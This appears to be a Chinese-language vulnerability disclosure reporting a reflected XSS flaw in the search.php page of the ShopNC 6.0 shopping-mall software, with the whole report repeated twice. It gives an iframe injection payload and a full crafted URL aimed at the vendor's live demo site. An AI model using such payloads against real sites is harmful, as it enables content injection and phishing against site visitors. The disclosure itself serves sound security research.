### 简要描述: 自称最安全的商城系统,ShopNC 单用户程序, 通过构造特殊url,实现对ShopNC的XSS攻击. 目前最新版本 6.0 存在此问题! ### 详细说明: Search.php页面 对search变量未进行严格过滤, 无论是否编码均执行用户url提交的脚本 比如,跨站脚本为 ``` <iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe> ``` 如图 [<img src="https://images.seebug.org/upload/201107/271225239737adaaa33356966b6d47e62c3de4ba.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201107/271225239737adaaa33356966b6d47e62c3de4ba.jpg) 目前可以在官方演示站进行测试 http://mall.shopnc.net ``` http://mall.shopnc.net/search.php?all_sun=all_sun&button=%e6%90%9c%e7%b4%a2%e7%bb%93%e6%9e%9c&end_price=&keywords=%27%22%28%29%26%251</textarea><iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>&sel_goods_brand=&start_price=&txt_class_top_id=0 ``` ### 漏洞证明: 都在详细说明中.
### 简要描述: 自称最安全的商城系统,ShopNC 单用户程序, 通过构造特殊url,实现对ShopNC的XSS攻击. 目前最新版本 6.0 存在此问题! ### 详细说明: Search.php页面 对search变量未进行严格过滤, 无论是否编码均执行用户url提交的脚本 比如,跨站脚本为 ``` <iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe> ``` 如图 [<img src="https://images.seebug.org/upload/201107/271225239737adaaa33356966b6d47e62c3de4ba.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201107/271225239737adaaa33356966b6d47e62c3de4ba.jpg) 目前可以在官方演示站进行测试 http://mall.shopnc.net ``` http://mall.shopnc.net/search.php?all_sun=all_sun&button=%e6%90%9c%e7%b4%a2%e7%bb%93%e6%9e%9c&end_price=&keywords=%27%22%28%29%26%251</textarea><iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>&sel_goods_brand=&start_price=&txt_class_top_id=0 ``` ### 漏洞证明: 都在详细说明中.